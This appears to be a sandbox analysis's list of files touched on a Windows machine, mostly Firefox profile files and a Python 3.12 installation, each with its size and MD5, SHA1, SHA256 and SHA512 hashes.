C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1l89xtkq.default-release\datareporting\glean\pending_pings\26191d3c-6837-4f5e-a837-d672dc092b6e

Filesize
982B

MD5
c728959efff03bcc9cf1b5c5cdf514c0

SHA1
b6d0ff28c357b5fb1648148c5fda4cc5ba76501d

SHA256
2e0bcc8fc97b5502f6169c568ddd93e67a59254fe97391d281d52beba681899a

SHA512
bd2534982067783f50acf5ac3784077e35869b052fe84af3386dbd93faafce30301ae42b5b2e09cd4e547cf02156656a0d87e864eecfbb02857153c527b402d7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1l89xtkq.default-release\datareporting\glean\pending_pings\2b624d9b-941a-4519-b978-db879383553b

Filesize
671B

MD5
08a032e1da90c693f6dff0dd076c91a7

SHA1
286e937fa495ecbcb2f82415d2fea1a3f4da7390

SHA256
7fa8ce2f9b209c4baa1b059fcabadf833ccfc976014da9098f67262b24f4b1e4

SHA512
910f5800ebb24346c013bd943c2da41fa140886d73eff1f8e6371a2b43900bf8091ae63000e6bb9b6603c17c1065832d9a0a6aa1360b47754a5a453cd97a87fd

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1l89xtkq.default-release\datareporting\glean\pending_pings\9d229d74-5a6f-46ce-82ae-104d7b7b1e0e

Filesize
26KB

MD5
f16fc46d443a62ca77a1549c7bff5758

SHA1
2f78c527054d942293b4fd0a07742ee62e965cad

SHA256
5194781bce2bb5d6c1d85d00b6777ade4a94b4becd55cc16af2812229978fea1

SHA512
9ba799d07314d0977c4a80ff455ea4a57201aa561e64e140c98a0fe48f589bc65dded05155e74a4da6a86c0d63b1d1000f4d05afce755729cb622fbd3a6ee08e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1l89xtkq.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

Filesize
1.1MB

MD5
842039753bf41fa5e11b3a1383061a87

SHA1
3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

SHA256
d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

SHA512
d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1l89xtkq.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

Filesize
116B

MD5
2a461e9eb87fd1955cea740a3444ee7a

SHA1
b10755914c713f5a4677494dbe8a686ed458c3c5

SHA256
4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

SHA512
34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1l89xtkq.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

Filesize
372B

MD5
bf957ad58b55f64219ab3f793e374316

SHA1
a11adc9d7f2c28e04d9b35e23b7616d0527118a1

SHA256
bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

SHA512
79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1l89xtkq.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

Filesize
17.8MB

MD5
daf7ef3acccab478aaa7d6dc1c60f865

SHA1
f8246162b97ce4a945feced27b6ea114366ff2ad

SHA256
bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

SHA512
5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1l89xtkq.default-release\prefs-1.js

Filesize
11KB

MD5
55ff48091d6c64bbd02173fa128f866d

SHA1
e480e9b0e53e648fab138924e1c96ae458b3d7df

SHA256
0ea59d5a27403e4c61634f13ca54c44438f9792316c587aad3ccc830e1c60536

SHA512
15dbedbc525adc583d96edcb21ea3184c5340af1c2b7b155241aec4ad224714937e54cad31b74abf58ef925b049e505493945c87d9aad7ab2e66c3ee24a4ca80

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1l89xtkq.default-release\prefs.js

Filesize
8KB

MD5
91b34462a20533fe5c72da482cd85603

SHA1
2100bb313c5b6ed9922272e213294b82474e4989

SHA256
5dc04bbcb947590e2a92939acaf91e008a7529c8c05cc714beac0fc3133cb5ba

SHA512
858e87c27e888dea0216288fff9daced24212ce80a5dc1c8040e8986507dc2f05ea57b073bdbccd1a6b0edeacdce83e50f324d9ec1e93f4fd35318865d9291b6

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Doc\html\NEWS

Filesize
1.6MB

MD5
3a2f081757c87fe3f9745f2e857755fa

SHA1
0d49e71b9e0ffaa4f4dc8dcb45a95baa664038e7

SHA256
a15b65d338884ef6b8b99ea300405a293dfec362610e79b8d19755112624210e

SHA512
21f9968546c590d9f8a87333345f6086725905ba2724e5ca5f8f8e1165c20703906fda8e1d0bf59517abe8b166b80f47380e70bb535713a1e7e313b673f21fbd

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\__phello__\__init__.py

Filesize
104B

MD5
d577c4cfec75304f5f339da0e128db83

SHA1
9542419ca9315d30602f4fe9c9c95d0a2f72bc4f

SHA256
b9ba5f17a049779747dbc8b17fa318fab67875be829994ed437c81d0666a88dc

SHA512
84720ac8d037b6fd51b08f63019f17f1b212069d3bf53c18fecaff4c8fac0c6bce4f73617a7c63fa9a8fd2ba32ba56c11c0a88484aa5e113f33ca768d6ef7bfe

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\concurrent\__init__.py

Filesize
39B

MD5
f8259102dfc36d919a899cdb8fde48ce

SHA1
4510c766809835dab814c25c2223009eb33e633a

SHA256
52069aeefb58dad898781d8bde183ffda18faae11f17ace8ce83368cab863fb1

SHA512
a77c8a67c95d49e353f903e3bd394e343c0dfa633dcffbfd7c1b34d5e1bdfb9a372ece71360812e44c5c5badfa0fc81387a6f65f96616d6307083c2b3bb0213f

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\ctypes\__init__.py

Filesize
18KB

MD5
d0859d693b9465bd1ff48dfe865833a3

SHA1
978c0511ef96d959e0e897d243752bc3a33ba17c

SHA256
bb22c1bd20afd47d33fa6958d8d3e55bea7a1034da8ef2d5f5c0bff1225832c0

SHA512
093026a7978122808554add8c53a2ead737caf125a102b8f66b36e5fd677e4dc31a93025511fcf9d0533ad2491d2753f792b3517b4db0cfe0206e58a6d0e646c

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__init__.py

Filesize
5KB

MD5
ea0e0d20c2c06613fd5a23df78109cba

SHA1
b0cb1bedacdb494271ac726caf521ad1c3709257

SHA256
8b997e9f7beef09de01c34ac34191866d3ab25e17164e08f411940b070bc3e74

SHA512
d8824b315aa1eb44337ff8c3da274e07f76b827af2a5ac0e84d108f7a4961d0c5a649f2d7d8725e02cd6a064d6069be84c838fb92e8951784d6e891ef54737a3

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__pycache__\__init__.cpython-312.pyc

Filesize
5KB

MD5
5793df77b697f1109fe6473952792aca

SHA1
99d036fd2a4e438bfb89c5cf9fab62292d04d924

SHA256
6625882aff1d20e1101d79a6624c16d248a9f5bd0c986296061a1177413c36f3

SHA512
809eb8fc67657cc7e4635c27921fffa1d028424724542ef8272a2028f17259c11310e6e4ddfe8c4b2c795e536a40300ec6d6b282b126de90698716cde944e5ad

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__pycache__\aliases.cpython-312.pyc

Filesize
12KB

MD5
1f1314b9020e3c6fe612e34124f9f2b0

SHA1
058c5eb8ff54f49905a5579ccdfccb38de087e97

SHA256
9c262190210f884f24e4d227cb6e4e9706b2909ff4ab18917bb9c86da0ddde26

SHA512
f1db57c6456def9001201e5db14523ab2cd97c6aba200699aff11a6e8d352009f072281fdec93cd764c4083778efeab2e34e1b0240b0938c4e0b10763b21bf76

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__pycache__\cp1252.cpython-312.pyc

Filesize
3KB

MD5
d42473ce94dd1209f1a2b65e7cc79d8f

SHA1
56001bd8a180e758e23fa9ff6fe37ec5fc29b6dc

SHA256
d7dc1703ebe0364c99ed7c8b02423b80c2ee6f48f31023ca8b7b836e83dc50db

SHA512
a523186188060a51849627c3dda24d39b414fa613ae7ab3895ed9b108cc96843019bc2fa475462ef33490bac9ee3e76dd868e699055341f66821557141db478b

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__pycache__\utf_8.cpython-312.pyc

Filesize
2KB

MD5
6f9bafab786fdd627c247fbe8e85de01

SHA1
ce99d8bfaa08e52be5dece42c851684458116988

SHA256
a225709104aa9d764c01de396add10bbcfb96a7ae019af69d8de81a683b1f245

SHA512
f53cce6e51e00cb120213810f74016fee82a62be4ed7b5fcdfaefa5f03eaca2e9fc01ad0b7e24860f82d8f2c34fd967e62aeeb04b6a59fe10553c36c96cc79b9

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\aliases.py

Filesize
15KB

MD5
ff23f6bb45e7b769787b0619b27bc245

SHA1
60172e8c464711cf890bc8a4feccff35aa3de17a

SHA256
1893cfb597bc5eafd38ef03ac85d8874620112514eb42660408811929cc0d6f8

SHA512
ea6b685a859ef2fcd47b8473f43037341049b8ba3eea01d763e2304a2c2adddb01008b58c14b4274d9af8a07f686cd337de25afeb9a252a426d85d3b7d661ef9

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\cp1252.py

Filesize
13KB

MD5
52084150c6d8fc16c8956388cdbe0868

SHA1
368f060285ea704a9dc552f2fc88f7338e8017f2

SHA256
7acb7b80c29d9ffda0fe79540509439537216df3a259973d54e1fb23c34e7519

SHA512
77e7921f48c9a361a67bae80b9eec4790b8df51e6aff5c13704035a2a7f33316f119478ac526c2fdebb9ef30c0d7898aea878e3dba65f386d6e2c67fe61845b4

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\utf_8.py

Filesize
1KB

MD5
f932d95afcaea5fdc12e72d25565f948

SHA1
2685d94ba1536b7870b7172c06fe72cf749b4d29

SHA256
9c54c7db8ce0722ca4ddb5f45d4e170357e37991afb3fcdc091721bf6c09257e

SHA512
a10035ae10b963d2183d31c72ff681a21ed9e255dda22624cbaf8dbed5afbde7be05bb719b07573de9275d8b4793d2f4aef0c0c8346203eea606bb818a02cab6

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\lib2to3\fixes\__init__.py

Filesize
48B

MD5
3d02598f327c3159a8be45fd28daac9b

SHA1
78bd4ccb31f7984b68a96a9f2d0d78c27857b091

SHA256
b36ae7da13e8cafa693b64b57c6afc4511da2f9bbc10d0ac03667fca0f288214

SHA512
c59c5b77a0cf85bb9fbf46f9541c399a9f739f84828c311ced6e270854ecce86d266e4c8d5aa07897b48ce995c3da29fea994e8cd017d48e5a4fab7a6b65e903

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\site-packages\pip-24.0.dist-info\INSTALLER

Filesize
4B

MD5
365c9bfeb7d89244f2ce01c1de44cb85

SHA1
d7a03141d5d6b1e88b6b59ef08b6681df212c599

SHA256
ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508

SHA512
d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\audiotest.au

Filesize
27KB

MD5
2d3d86aedec6b204f70cee1e483d3e14

SHA1
0bb29f5835dbf25b09e98271205a5b0e3b499ac3

SHA256
bb24009573f88b990c922fdc65adddec1312e30373dc635c6099912d4f836a41

SHA512
4981b870b89ab02309d9b5a4acdadd1f145baaacb5f23d0575ba2c62f10bbfe2343c1178456270ad5d9f22f9528e846928d014c14146ec100b8bfeb07cb3f29a

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\certdata\capath\4e1295a3.0

Filesize
828B

MD5
73e784827cc9c81f8ca3fbd372984afd

SHA1
d1553f1e3c103bb429e3af0c2211414fc1d16d4b

SHA256
11772d99be4b8d343c1299eb2f332f0612c290643543708d860bf81c25cfb5c9

SHA512
f8a52854ccdbe535be524aa67a9ba7d793244ba431b2a73cd39b8e5fb925fb09347bdd5333716e44a02e2b814d0f15156992ecc0a1bbb1c89c6e1d5ec18990b3

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\certdata\capath\5ed36f99.0

Filesize
2KB

MD5
3fe5f823824bedd9fe3176e58db69fa4

SHA1
807cc9ffa5fe60115bf9df8a086f5cb1199b0a19

SHA256
9c6a82a2d3c4c374fcc2e78d3eda445ebce74d3a7a4d84fc447739df91cb1f0c

SHA512
03f0684a8ad2545add75637562655dfa3c89d06159d607df6e2efac2c446a95bd9cb0437f1c195a75b2e438d7e7812f4f85fbf136e45402947298a1e3fb3506a

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\certdata\capath\b1930218.0

Filesize
1KB

MD5
6688a112dc263017affbadeb4b4e4fb4

SHA1
4567ed723977e15d26da815c51046db208c068a0

SHA256
5d35cb81810204013d7fffeb0d01092f9243f994aabfebd017a1d3c217b15693

SHA512
90e5f78f3cd4a0c97331cf66eb4a94115f3cad878eb351d05bc6a8f38dfd8bf18b9a62d5b953d3d4fc36f240db85656e5070bea807967961c365f5ff4ccd6a82

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\cjkencodings\cp949-utf8.txt

Filesize
478B

MD5
4ad57dc71cd0710481e757484c6d1197

SHA1
44cffb5117f62e0697f27f9d2537de3108749df4

SHA256
175e984c0c7bd073f037b0aaa6df4d8aadacb6f1b8898484a567b5e70f5a5837

SHA512
4a2f934f6f907cd2b3c70e3614684460f253e29ce554a418cdc53555feb26252607283d4d5c27221cc8205d002febf4c73b49d5ac0c6b7376e5dade72e9fc9ee

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\cjkencodings\euc_jisx0213-utf8.txt

Filesize
1KB

MD5
856e0cebae566258f572e27aedcbf34d

SHA1
9c4e3bafcc4a0c146d4bf21dd126484bb454e789

SHA256
21cb011018b58c87f2c824e08085d24f9379244bcde6fbb6b46da2f6431540c7

SHA512
21e996c6470367d7a74e6cf96b0105ddd93fda0c20fa4053842c3504f582c83688caf04fb64f7fa0e28378d894d29a7b1a39b8bfa7869f710fcc804a6231b3b8

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\imghdrdata\python.bmp

Filesize
1KB

MD5
e3a1f317b1a275e5d5f1b4b0ff04ee01

SHA1
8f37f2c3b3c5b5fd2da41ddcc59ad1b6c29b9bf0

SHA256
410c26b109ce9d32d35c0e4bc6dc92a7579910ce706939a056323de5801a7a87

SHA512
31e83c2bdbd86b038ba0e8ebf02947ddaef002033c760e16ea868c7a673257686d89e328017cbbc8915d31f62fb5149aa0569437525dff8325dd4a8499d718b7

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\imghdrdata\python.exr

Filesize
2KB

MD5
30ffa52a5a358b289c249e1e2d2fa666

SHA1
d07051ed146c1910dbe5d0de8a08d86031390edb

SHA256
abcfa16526dd3d1f31954f88813928de507f4bf2911f30d08ff756d8b46baee5

SHA512
9ffbef0197305e9f1df486af25b743ae0ae5cdc7e198ce8bd45f62e87acbbc4c431fd9944f7dd04103461df392a22c1df43a0e49644adeff2822c1e43b71a43c

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\imghdrdata\python.gif

Filesize
405B

MD5
bb6db723ceadf8ce03d5ad234f9d7273

SHA1
46537a3e2b3764d35e4bff0c951fa87adc17fb83

SHA256
4fce1d82a5a062eaff3ba90478641f671ce5da6f6ba7bdf49029df9eefca2f87

SHA512
bd07b17fb373bea74b9af28e504c6d66c897978e071404e7d04a7bc1a0843e0d7ca5689fc7215e15a9721757889bc75ed920ca72f17810922ae99d62c65c831c

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\imghdrdata\python.jpg

Filesize
543B

MD5
50e9104383c3f36fa9e9be6148e6fdf3

SHA1
9b19331a00f83f12fdc2feba2eb401f9732f8d44

SHA256
0171178ae901e108f56305aff7e36268a690bc49933a24b1aaa587fda00f4d3b

SHA512
c6c940a0e60c1d5c75398592f61da3c874e3bc2b5b7ff328d83de8c8352a4e1e3959954e67049a5c3d6a609af97e39d0e0d16b5a4463328bbc436b8e2926e5d0

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\imghdrdata\python.pbm

Filesize
41B

MD5
4128214992ffcd16a57fd47c73558b58

SHA1
d8a65c33c1df14930651e1b34b9349b6b179205a

SHA256
7151dc8ebdca81804c959266b14122bf74e62cab773dd8e2f37b379aac105266

SHA512
1c2a56f82742d9f0d8976183ca130454d6e472524a12eb38c4106eaa5bffdb3bf7de3eb31908fea096fb6017c87dd82097bbbd1b17c0ae484ee52a0e192b9590

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\imghdrdata\python.pgm

Filesize
269B

MD5
18ceaa0a28ec83628b429486f6a6a437

SHA1
1c1c30720dd823863542845395c5a4699a19a060

SHA256
3c27b4cdc7089ddb410ddb81a5ccf42662972e07dfc44fc429d3056af6dd128e

SHA512
1e904378aa240af975fd6ce75b7bf8366105972f257457d317f1ea2e40cab7d1d52ddd95e9d020f50ee5ab298b3b6a0f73f43270155b33ad5bed6d358bac9262

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\imghdrdata\python.png

Filesize
1020B

MD5
91f80d44b0a786e5b0b3049ad61159fa

SHA1
e2fa9ade66052b6c706dec73bae2b44969232ad6

SHA256
480ac039362a15a7738ba76dffe807fd03fa29f7edaa8eb21ca0057c44a1ee8c

SHA512
c73fc0baebc8974e4ad152c81a784aa8ac434d387040c19d75d1cb9e8417e89b6af07b01b88004f9ced6c1feaf8994a04ee926769ee01757932f25b0a834ac30

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\imghdrdata\python.ppm

Filesize
781B

MD5
a2b32811bb48fbf84e6a4ffa90b6a81c

SHA1
df8515c83469e5f728331f20eb6264953fbc40c7

SHA256
a7f21a2c5226b7d35ccac23780ae535921353b54bf7d7e61f1ad9b021167ba6c

SHA512
a49d7738997b62be088a09cdcf86d9e1fa12dd531c1a880eb519664daf87be581777843a02f15b35d731d1e0f58077ee5630235c71e2a11cebeb337b6528e0a9

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\imghdrdata\python.ras

Filesize
1KB

MD5
8c0f739219341ffae245b5ae0a63710f

SHA1
ee63733bbfac51ed6c2ed2dab2a250faf25f36af

SHA256
10e37c432b4b93a7d257fbb890636fa7f6f376321cca47d5919ea5b6adc75d38

SHA512
5c4db61b091375d87001a600c282285f0e66fcdd4e99c5bbe03a8e7ec0b898abae777454491e7d9f9da5fe9bd56b6e5d5d5e0c8e142f629780fb3a399b3f4add

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\imghdrdata\python.sgi

Filesize
1KB

MD5
11e019f5073be9f31a95f34929fec4e2

SHA1
baa350987e3f3b936db33abc6ddfae0762d4c449

SHA256
58ba5f2c20d320c3f5390ff9778e03d341957bd37c5d3cf0c3327976979f2e01

SHA512
c9b006d3c76358aabf2636f73cdb1d6d56e8f09d4a9817fb80386cd71228e8c93f570f00798870a9ebcc15aae625923c7405fc6827928579f4f44a661e9ef6b7

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\imghdrdata\python.tiff

Filesize
1KB

MD5
d8580e24bfb05ec687436beb33838368

SHA1
99eefffec67780cc34ce21ea7c5b5b3073719011

SHA256
f19a80d1c7d5d758dcea82276e73150454212a5136b19c5fc2727786132ddafd

SHA512
de4c92d0a4f9747b13e9f0c2c1d88e8d8d2151cbe693651e248b72cee43bacf13f0968db9a6d8f2abb2a1c74b4fb5ebc0358651586d4e66da3dc02e63e5afc7c

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\imghdrdata\python.webp

Filesize
432B

MD5
d4d9cee903091f613295efe4b5935689

SHA1
152fb2d413cee0e7c560351c904c2b1a1bb2380a

SHA256
d87f8d1367c93897805ee274c0e53ddbb0a46525aadb7dd32756fb85ad74e8b0

SHA512
67032fb0cce8001db79462bbe9653db4a80605b72077aaee9a2db85c0af6a223d2f452185112420afdf5922358aa07eda410c791efcf247201354816fb014011

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\imghdrdata\python.xbm

Filesize
288B

MD5
e6d79a573ec495b479a2c6e4f77f134b

SHA1
06f1b0de642132260c8067744cd6dd119c1a5ed2

SHA256
e7ff41947d7400cbe040e622d9ba92c40127355ffd96f182a54b8a80118e7c0b

SHA512
604179f7be08029ade027b2883983d8b524c0db9713a0646e007f608765db3d58c14e9be74c43e494b5462cca5c47494c06943ef04e82c129d1acad293c66e6b

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\sndhdrdata\sndhdr.aifc

Filesize
106B

MD5
a8a96fc714afadc15f870716186876f4

SHA1
21586b8440f26424f1b8ab66c338664f010c3cb7

SHA256
884528c663a2c5bc5977c54655699389e6d31420d0e79ac6fccac835ee0b167e

SHA512
ec64e6cca3f45438087c6e4c02a16218b17bd5c38e48c68d30c42d334607c8eaa188263eae56bb452244673d3bac75632f625b22f1862bf7e2b0a2585b17dc2a

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\sndhdrdata\sndhdr.aiff

Filesize
108B

MD5
3d4d023133dc4e66488dd5fd8d972124

SHA1
f93f56d42e08ad7e80b6fbe7aa1c76b8b994de3f

SHA256
3636198f2e61362121c9f7adfbde802883c99e6b23977e4e0bbbbd042b307421

SHA512
9e1dd8887ac56417cc516d0ba680749b351ae7b12770e188b56deedf4971586df81d7825a48afaa47554b4bd8edf427beacdf81336959c58ad6f13d4ea5b37a1

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\sndhdrdata\sndhdr.wav

Filesize
64B

MD5
eb0b6503152295540c09094b1d64a6a3

SHA1
d82d8deb9f0c69515fdaec06bcb9345472bbd94c

SHA256
54e018785efc750bbbafe910f4b4e4240995b5a2143a4341dc5c1bb73151c1d8

SHA512
1b3edf97c8f6cc247c532ff7640c660c73bbcd4ff769c21fa7dd550fcb799a304b5aabe6a6b73ac878f7e11570651a264c3c31ca3a3f81cbe19fcef5c4f61140

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\test_import\data\circular_imports\subpkg\util.py

Filesize
23B

MD5
26de9aa26f4f0b109363b91eb9f8bb97

SHA1
f86b316ac1901528bb35fe725cf08b8017a93cdc

SHA256
0a00579f58936a271c5a5e903d2d4f26bfa11347f83222f217263bf2ecfd546c

SHA512
c6d1cccec9cc49cad8f16fe1795adba660beacdff157daa175bcc96da4eb92afba294ffc32fe3dae87ff6399c0a98a3475040f5aa92db8129b94d0d05d516e5e

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\test_importlib\namespace_pkgs\not_a_namespace_pkg\foo\one.py

Filesize
27B

MD5
002c0c3dd72075ea93c1f9f17bc55009

SHA1
c8b6fb242803e9b5cdb675455f6bc8d585d04d0e

SHA256
8f083d9f27afa6518d7b058bb322d3e79c0becf9f38a96334ad7a3cc4b3483fa

SHA512
1598b79a6357932b08b3ab8d6b6af424a697d7770b71984808f9d2375bb64ef68e31f23106d8b4dcb4d70cbb814497298cb6133c67eae83035b561848110c20d

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\test_importlib\resources\data01\utf-16.file

Filesize
44B

MD5
ff6357f0940465f479305cbe0ba8f78f

SHA1
3bf88b182117dce769d0cb03fb14ab771f827649

SHA256
b79abdaa1c57d2b62a22d04e33c0f7ca5c06f911eb9ce62d7932ed42beac17b8

SHA512
11989f26c71c2879e0083fb436286238f50069ea3c7771c5b25b278e589ad4262a12f580a8c082fea291f0264f1ac212a169ea4ec5b44b1232070cc9797a0307

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\test_importlib\resources\data01\utf-8.file

Filesize
20B

MD5
58da4ec0dd953291e42b4a78598913da

SHA1
7e13931923104bda5ae0fe40db20d0aaf51610f9

SHA256
9305a0606e3243e645d97fd603ae848d83e6c49467fb0f1a48e892f5ef2d2986

SHA512
039c0ad2c558a7d3a5d26e5e2872833c84d837947851085989c44ef5c5c17f4381197284e19b2c96767a2646ed23ab360c6a2ad533b79f078e744655ce4c5ccd

Download Submit
C:\Users\Admin\Downloads\Python\Python312\Lib\test\test_unittest\__init__.py

Filesize
154B

MD5
e1b27d214a1714271983ee7f7f5c9f37

SHA1
c62c91feeb1f5ae570b5c9c03ae29ee445639429

SHA256
329743706d4d31db91597c27c0e61f754473b15fb89c52b67ffbd5d6b9d6041a

SHA512
a0a7604f0c7abcbb677fd182345f04be971b40a784bcf28efe62eee18090672222468791e981754b1900b9f0830139ea9bf09e2103e3b0e9a1a5adca26cdba09

Download Submit
C:\Users\Admin\Downloads\Python\Python312\python.exe

Filesize
100KB

MD5
3d44212bba2d7a88d6c83ce8523bba88

SHA1
62ea5374c17b0f2f88f7d4a6c03b592393dba6f8

SHA256
15b41a488c356c0e331facdea6c836a6cec021f12d5fde9844e7ca4a1aa0361a

SHA512
89297f1fbe811b23a38fc3dbc22989dfb9faf97960c65f1f0f43be710204b32f41f33ef0bb893815db71c4462d04b52f686b40801f6d4cbd8e529d740618ac67

Download Submit
C:\Users\Admin\Downloads\Python\Python312\python312.dll

Filesize
6.6MB

MD5
3c388ce47c0d9117d2a50b3fa5ac981d

SHA1
038484ff7460d03d1d36c23f0de4874cbaea2c48

SHA256
c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb

SHA512
e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

Download Submit
C:\Users\Admin\Downloads\Python\Python312\tcl\tcl8.6\encoding\euc-cn.enc

Filesize
84KB

MD5
c5aa0d11439e0f7682dae39445f5dab4

SHA1
73a6d55b894e89a7d4cb1cd3ccff82665c303d5c

SHA256
1700af47dc012a48cec89cf1dfae6d1d0d2f40ed731eff6ca55296a055a11c00

SHA512
eee6058bd214c59bcc11e6de7265da2721c119cc9261cfd755a98e270ff74d2d73e3e711aa01a0e3414c46d82e291ef0df2ad6c65ca477c888426d5a1d2a3bc5

Download Submit
C:\Users\Admin\Downloads\Python\Python312\tcl\tix8.4.3\demos\bitmaps\drivea.xbm

Filesize
904B

MD5
a4ec724dc948f7094dc0eacb5a960f40

SHA1
0fcfe0dd79a951a593256a7257a7410a0294f546

SHA256
459e941ecd87984672bf1255da19a8de74f114e173e838f6b85ac734e7ef5fd1

SHA512
2c6ccda98d2c665dffb7e7340ad44822780e20e3ebb0493b58a313c0c46a62bb21be94ca0e3226aa52f410cf6ce3f0c2b2c95a0434c6e0678e77ec4ca55eec32

Download Submit
C:\Users\Admin\Downloads\Python\Python312\tcl\tix8.4.3\demos\bitmaps\drivea.xpm

Filesize
1KB

MD5
93d39c85d0d9052a1eb932904e93da24

SHA1
6fd812fca35b166ba57c7a4e4a21c3d1a371959d

SHA256
05164d5becdda54104b20bc8f7358f627be9f2602d6b3e344a3033d92e73d148

SHA512
7032169b5952043fefb0856c01acf7cfa1632a4ecab4f460b0634cd8d5bc0de270f32586246b44eca13ce555bc893d44b1f659e125fef1fb1854dfb4ed89be55

Download Submit
C:\Users\Admin\Downloads\Python\Python312\tcl\tix8.4.3\demos\bitmaps\netw.xbm

Filesize
898B

MD5
23f6b504a1004a9a2c91d0fcf5bce9b2

SHA1
4ea189c3af76a7df714c397bea1e32c1625d115c

SHA256
9efee21d14731a4d7b3bd7d9e3c02198bca7195173e009c25ef54a7538c93780

SHA512
0b82bdfebb4fad94b74207d23616633eee955f8203a020f4f4b957e61efece1609440741a60822e4884fadf4dddf43cae34b519b64a5e018e7a8031e8cd561b4

Download Submit
C:\Users\Admin\Downloads\Python\Python312\tcl\tix8.4.3\demos\bitmaps\netw.xpm

Filesize
1KB

MD5
5165aae8ed4c6ee20b9aa6c3304e8042

SHA1
2404f7443e8797e335dd6bd93d8cf67dec291482

SHA256
068e6f025c1e4bb5b019ff51416fcedd4e5d211d5fca99412b19ded1295b2556

SHA512
ba573c5eb9f92f5c31236a35b021b366e4450b26f077f4c0f18ffd7f83a590e8e8415f7ecf057186ae0b0178ba04b13f5060c705c4a05fdd1a1ed4ffb911d0a9

Download Submit
C:\Users\Admin\Downloads\Python\Python312\tcl\tk8.6\demos\images\tcllogo.gif

Filesize
2KB

MD5
ff04b357b7ab0a8b573c10c6da945d6a

SHA1
bcb73d8af2628463a1b955581999c77f09f805b8

SHA256
72f6b34d3c8f424ff0a290a793fcfbf34fd5630a916cd02e0a5dda0144b5957f

SHA512
10dfe631c5fc24cf239d817eefa14329946e26ed6bcfc1b517e2f9af81807977428ba2539aaa653a89a372257d494e8136fd6abbc4f727e6b199400de05accd5

Download Submit
